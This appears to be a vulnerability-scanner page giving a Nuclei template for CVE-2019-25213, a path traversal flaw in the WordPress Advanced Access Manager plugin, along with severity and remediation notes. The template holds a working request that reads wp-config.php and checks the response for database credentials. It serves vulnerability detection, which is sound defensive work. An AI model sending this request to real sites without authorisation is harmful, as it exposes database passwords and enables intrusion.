WordPress Advanced Access Manager - Path Traversal

CVE-2019-25213
Early Release

Description

The Advanced Access Manager plugin for WordPress is vulnerable to Unauthenticated Arbitrary File Read in versions up to, and including, 5.9.8.1 due to insufficient validation on the aam-media parameter. This allows unauthenticated attackers to read any file on the server, including sensitive files such as wp-config.php

Severity

Critical

CVSS Score

9.8

Published Date

November 29, 2025

Template Author

riteshs4hu

CVE-2019-25213.yaml
id: CVE-2019-25213

info:
  name: WordPress Advanced Access Manager - Path Traversal
  author: riteshs4hu
  severity: critical
  description: |
    The Advanced Access Manager plugin for WordPress is vulnerable to Unauthenticated Arbitrary File Read in versions up to, and including, 5.9.8.1 due to insufficient validation on the aam-media parameter. This allows unauthenticated attackers to read any file on the server, including sensitive files such as wp-config.php
  impact: |
    Unauthenticated attackers can read sensitive files like wp-config.php, leading to information disclosure and potential further exploitation.
  remediation: |
    Update to the latest version of the plugin that addresses this vulnerability.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/55e0f0df-7be2-4e18-988c-2cc558768eff?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2019-25213
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-25213
    cwe-id: CWE-264
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "wp-content/plugins/advanced-access-manager"
  tags: cve,cve2019,wordpress,wp-plugin,wp,advanced_access_manager,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=aam-media-load&aam-media=/wp-config.php"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_all(body, 'DB_NAME','DB_USER','DB_PASSWORD')"
        condition: and
# digest: 4b0a00483046022100eb74258de3f5fb8578c5524e0337dc78eed91e6ad227361e57245d988bd4964b022100c2a4a72ad77cb694bd46814ef1751e05edf940dbe5ff1d300c64cf3e4d344b40:922c64590222798bb761d5b6d8e72950
9.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2019-25213
CWE ID:
cwe-264

Remediation Steps

Update to the latest version of the plugin that addresses this vulnerability.